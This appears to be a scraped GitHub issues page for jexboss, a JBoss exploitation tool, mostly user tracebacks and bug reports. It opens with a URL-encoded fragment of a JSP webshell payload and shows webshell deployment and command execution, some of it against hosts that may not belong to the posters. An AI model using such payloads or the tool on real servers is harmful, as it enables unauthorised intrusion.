C%29%7B%6F%75%74%2E%70%72%69%6E%74%6C%6E%28%64%29%3B%64%3D%62%72%2E%72%65%61%64%4C%69%6E%65%28%29%3B%7D%7D%7D%63%61%74%63%68%28%45%78%63%65%70%74%69%6F%6E%20%65%29%7B%6F%75%74%2E%70%72%69%6E%74%6C%6E%28%22%55%6E%6B%6E%6F%77%6E%20%63%6F%6D%6D%61%6E%64%22%29%3B%7D%7D%25%3E&argType=boolean&arg4=True (Caused by ProtocolError('Connection aborted.', BadStatusLine("''",)))
Any clue how prevent this kind of error?
Hi thanks for the awesome tool but i want to ask how can we use our own payload with --load-gadget ? Or can you please add ysoserial payload generate tool to automate ? I see you added some of them but not all. Sorry for bad english. Thank you for attention. Regards.
Getting following error when trying admin_console
[code]
Traceback (most recent call last):
File "./jexboss.py", line 681, in
main()
File "./jexboss.py", line 520, in main
auto_exploit(url, i)
File "./jexboss.py", line 313, in auto_exploit
result = _exploits.exploit_admin_console(url, gl_args.jboss_login)
File "/root/jexboss/_exploits.py", line 461, in exploit_admin_console
cookie = r.getheader('set-cookie').split(";")[0]
AttributeError: 'NoneType' object has no attribute 'split'
[/code]
when using standalone mode and -A with a target whose admin-console is vulnerable,I got this:
pydev_imports.execfile(file, globals, locals) # execute the script
File "F:/Dev/Python_Projects/gsz/jexboss.py", line 1016, in
main()
File "F:/Dev/Python_Projects/gsz/jexboss.py", line 885, in main
auto_exploit(url, vector)
File "F:/Dev/Python_Projects/gsz/jexboss.py", line 548, in auto_exploit
result = _exploits.exploit_admin_console(url, gl_args.jboss_login)
File "F:/Dev/Python_Projects/gsz_exploits.py", line 825, in exploit_admin_console
cookie = rheader.split(";")[0]
AttributeError: 'NoneType' object has no attribute 'split'
the line message maybe wrong because I have modifid this version.
it may cause by response "set-cookie" is null,because username/password is wrong
Hi joaomatosf,
Traceback (most recent call last):
File "jexboss.py", line 660, in
main()
File "jexboss.py", line 542, in main
result_exploit = auto_exploit(url, key)
File "jexboss.py", line 313, in auto_exploit
result = _exploits.exploit_admin_console(url, gl_args.jboss_login)
File "C:\Python2713\jexboss-master_exploits.py", line 466, in exploit_admin_c
onsole
payload = "login_form=login_form&login_form%3Aname="+username+"&login_form%3
Apassword="+password+"&login_form%3Asubmit=Login&javax.faces.ViewState="+url_enc
ode(state)
File "C:\Python2713\jexboss-master_exploits.py", line 442, in url_encode
return urllib.quote_plus(text)
File "C:\Python2713\lib\urllib.py", line 1303, in quote_plus
if ' ' in s:
TypeError: argument of type 'NoneType' is not iterable
Fresh install without any error on Git Bash for Windows is not working.
$ python jexboss.py -h
Traceback (most recent call last):
File "jexboss.py", line 49, in
from _exploits import *
File "E:\jexboss_exploits.py", line 21, in
from jexboss import *
File "E:\jexboss\jexboss.py", line 64, in
traceback.print_exc(file=debug_file)
NameError: name 'debug_file' is not defined
Hello
I've get this error while checking the server ::
[*] Checking Servlet Deserialization:
[*] Checking Application Deserialization:
The commands like "cd .." or "cat > Test.txt" are not working ...
Hey great tool! It doesn't seem to work over HTTPS when using port 8443? My guest portal I want to test against is hardset to TCP port 8443 but I get the error below;
** Checking Host: https://10.5.123.4:8443/portal/SelfRegistration.action?from=LOGIN **
[*] Checking Struts2:
Hello,
I have a problem, failed script.
Traceback (most recent call last):
File "jexboss.py", line 415, in
autoExploit(url, i)
File "jexboss.py", line 105, in autoExploit
shell_http(url, type)
File "jexboss.py", line 133, in shell_http
resp += " " + r.data.split(">")[1]
IndexError: list index out of range
Hi,
When executed the following command to run jexboss.
python jexboss.py -host http://localhost:8080
I am getting the following result
* Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
** Checking Host: http://localhost:8080 **
[*] Checking admin-console: [ OK ]
[*] Checking Struts2:
* An error occurred while connecting to the host http://localhost:8080 (HTTPConnectionPool(host='localhost', port=8080): Max retries exceeded with url: / (Caused by ReadTimeoutError("HTTPConnectionPool(host='localhost', port=8080): Read timed out. (read timeout=6.0)",)))
[*] Checking Servlet Deserialization: [ OK ]
[*] Checking Application Deserialization: [ OK ]
[*] Checking Jenkins: [ OK ]
[*] Checking web-console: [ OK ]
[*] Checking jmx-console: [ OK ]
[*] Checking JMXInvokerServlet: [ OK ]
* Results:
The server is not vulnerable to bugs tested ... :D
* Info: review, suggestions, updates, etc:
https://github.com/joaomatosf/jexboss
* DONATE: Please consider making a donation to help improve this tool,
* Bitcoin Address: 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C
Can anyone help me with this? The connection between my workstation and the remote server (for which I have masked the IP with 'localhost' here) is completely fine. I have all services's access to this server.
hello,
i was wondering is there a patch already that fixes these vulnerabilties or can this script be executed on all jboss versions :D
thanks.
@Version: 1.2.4
** Checking Host: google.com **
[*] Checking JMX Tomcat:
An error occurred while connecting to the host google.com (list index out of range)
Results:
The server is not vulnerable to bugs tested ... :D
How to solve this problem anyone?
Is anyone having the same error messages as follow?
/usr/local/lib/python2.7/dist-packages/requests/packages/urllib3/connectionpool.py:843: InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
InsecureRequestWarning)
Based on the recommended URL, I added the disable warning message (not recommended of course) but am still seeing a horde of the warning messages. Any idea?
import urllib3
urllib3.disable_warnings()
I get the following error, even though says successful. Screen dump below. @Version: 1.0.10
Traceback (most recent call last):
File "jexboss.py", line 523, in
main()
File "jexboss.py", line 372, in main
auto_exploit(url, i)
File "jexboss.py", line 221, in auto_exploit
shell_http(url, exploit_type)
File "jexboss.py", line 261, in shell_http
r = pool.request('GET', url + path + cmd, redirect=False, headers=headers)
File "/usr/lib/python2.7/dist-packages/urllib3/request.py", line 68, in request
*_urlopen_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/request.py", line 81, in request_encode_url
return self.urlopen(method, url, *_urlopen_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/poolmanager.py", line 161, in urlopen
response = conn.urlopen(method, u.request_uri, *_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 617, in urlopen
release_conn=release_conn, *_response_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 617, in urlopen
release_conn=release_conn, *_response_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 617, in urlopen
release_conn=release_conn, *_response_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 597, in urlopen
_stacktrace=sys.exc_info()[2])
File "/usr/lib/python2.7/dist-packages/urllib3/util/retry.py", line 271, in increment
raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPConnectionPool(host='x.x.x.x', port=8080): Max retries exceeded with url: /jexws3/jexws3.jsp?ppp=id (Caused by ReadTimeoutError("HTTPConnectionPool(host='x.x.x.x', port=8080): Read timed out. (read timeout=6.0)",))
Got the following error:
* Sending exploit code to [redacted]. Please wait...
* Successfully deployed code! Starting command shell. Please wait...
* - - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - - *
* [redacted]:
Traceback (most recent call last):
File "jexboss.py", line 544, in <module>
main()
File "jexboss.py", line 393, in main
auto_exploit(url, i)
File "jexboss.py", line 242, in auto_exploit
shell_http(url, exploit_type)
File "jexboss.py", line 283, in shell_http
resp += " " + str(r.data).split(">")[1]
IndexError: list index out of range
I'm not sure if the site's IPS is the one causing the issue.
Hi,
Got an error while executing other command like 'cd' or any other command.
I'm getting the following error when trying to use jexboss for the first time:
Hi, joaomatosf,
When I use your tools to exploit, I find many false alarm.
I was been told there ware all VULNERABLE, then I tried to run an automated exploitation to execute a command,but only got an error "*Error contacting the command shell. Try again later..."
Then I tried to access the url like http://xxxx.com/jmx-console/, the response status is 200 and the body is:
<!--link rel="stylesheet" href="/layout/default.css" type="text/css"-->
<html>
<head>
<script type="text/javascript">
window.location.href='http://xxxxxx.com/404.jsp';
</script>
</head>
<body>
</body>
</html>
I read the codes and suspect the logic of check_vul method in jexboss.py isn't rigorous. In the check_vul, HEAD method is used to get the response and judge whether been VULNERABLE only depend on the response's status.If status is 200 or 500, there are VULNERABLE. But, my response's status is 200 and the response's body is a 404 page.So I think it's better to check the body's content to avoid the false alarm.
Thank you!
Estou recebendo connection timed out provavelmente porque da maquina que estou executando só consigo acessar internet via proxy.
Achei que usando a opção "-D" iria evitar o erro abaixo mas recebei o mesmo erro. Esta opção não deveria evitar de fazer a chamada para http://joaomatosf.com/rnp/releases.txt?
Na verdade então essa issue é uma feature request para implementar suporte a proxy.
Traceback (most recent call last):
File "jexboss.py", line 551, in <module>
main()
File "jexboss.py", line 367, in main
updates = check_updates()
File "E:\jexboss\_updates.py", line 107, in check_updates
r = pool.request('GET', url, redirect=False, headers=header)
File "E:\Python27\lib\site-packages\urllib3\request.py", line 66, in request
**urlopen_kw)
File "E:\Python27\lib\site-packages\urllib3\request.py", line 87, in request_encode_url
return self.urlopen(method, url, **extra_kw)
File "E:\Python27\lib\site-packages\urllib3\poolmanager.py", line 244, in urlopen
response = conn.urlopen(method, u.request_uri, **kw)
File "E:\Python27\lib\site-packages\urllib3\connectionpool.py", line 671, in urlopen
release_conn=release_conn, **response_kw)
File "E:\Python27\lib\site-packages\urllib3\connectionpool.py", line 671, in urlopen
release_conn=release_conn, **response_kw)
File "E:\Python27\lib\site-packages\urllib3\connectionpool.py", line 671, in urlopen
release_conn=release_conn, **response_kw)
File "E:\Python27\lib\site-packages\urllib3\connectionpool.py", line 643, in urlopen
_stacktrace=sys.exc_info()[2])
File "E:\Python27\lib\site-packages\urllib3\util\retry.py", line 303, in increment
raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPConnectionPool(host='joaomatosf.com', port=80): Max retries exceeded with url: /rnp/releases.txt (Caused by ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x000000000357A518>, 'Connection to joaomatosf.com timed out. (connect timeout=3.0)'))
I noticed that the variable was declared as "auto-exploit", but was referenced as "auto_exploit" in the rest of the code (dash vs. underscore). This may be causing issues with the intended function of auto-exploit feature:
Line 505: parser.add_argument("--auto-exploit", "-A",....
Line 228: if not gl_args.auto_exploit:
Hi,
Firstly, thanks for the great tool!
I'm not aware of any way to resume a session with an already exploited server (on which the webshell is already deployed), have I missed something?
If not I think it can be an interesting feature to implement.
Thanks!
** Checking Host: http://www.frauen-ficken.webcam-sex-chat.net **
Traceback (most recent call last):
File "jexboss.py", line 523, in
main()
File "jexboss.py", line 372, in main
auto_exploit(url, i)
File "jexboss.py", line 221, in auto_exploit
shell_http(url, exploit_type)
File "jexboss.py", line 262, in shell_http
resp += " " + str(r.data).split(">")[1]
IndexError: list index out of range
** Checking Host: http://188.165.0.15 **
Traceback (most recent call last):
File "jexboss.py", line 523, in
main()
File "jexboss.py", line 372, in main
auto_exploit(url, i)
File "jexboss.py", line 221, in auto_exploit
shell_http(url, exploit_type)
File "jexboss.py", line 262, in shell_http
resp += " " + str(r.data).split(">")[1]
IndexError: list index out of range
running Python 2.7, the following line returns a r.status of 200
https://github.com/joaomatosf/jexboss/blob/master/jexboss.py#L120
in certain cases, hosts listening on port 80 do not handle the HEAD request nicely and return a garbage response. It looks like Python 2 is doing this, while Python 3 will see the correct response and generate an exception
In 2.7:
>>> r = pool.request('HEAD', url +str(paths['admin-console']), redirect=False, headers=headers)
>>> r.status
200
In 3.4:
>>> r = pool.request('HEAD', url +str(paths['admin-console']), redirect=False, headers=headers)
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 331, in _make_request
httplib_response = conn.getresponse(buffering=True)
TypeError: getresponse() got an unexpected keyword argument 'buffering'
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 516, in urlopen
body=body, headers=headers)
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 333, in _make_request
httplib_response = conn.getresponse()
File "/usr/lib/python3.4/http/client.py", line 1171, in getresponse
response.begin()
File "/usr/lib/python3.4/http/client.py", line 351, in begin
version, status, reason = self._read_status()
File "/usr/lib/python3.4/http/client.py", line 333, in _read_status
raise BadStatusLine(line)
http.client.BadStatusLine: Ú¬LIP�=¶<��Þ�brĸ�¢nÆGÕc¡»�6Fh¶ñ?àTáÿ»�¾îr»0á�÷<}�Ù6¯�õ¢+àÑÎgìmºc¸ÉfDåÒ��Áþ×�]êÓh¹��ôÕ
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.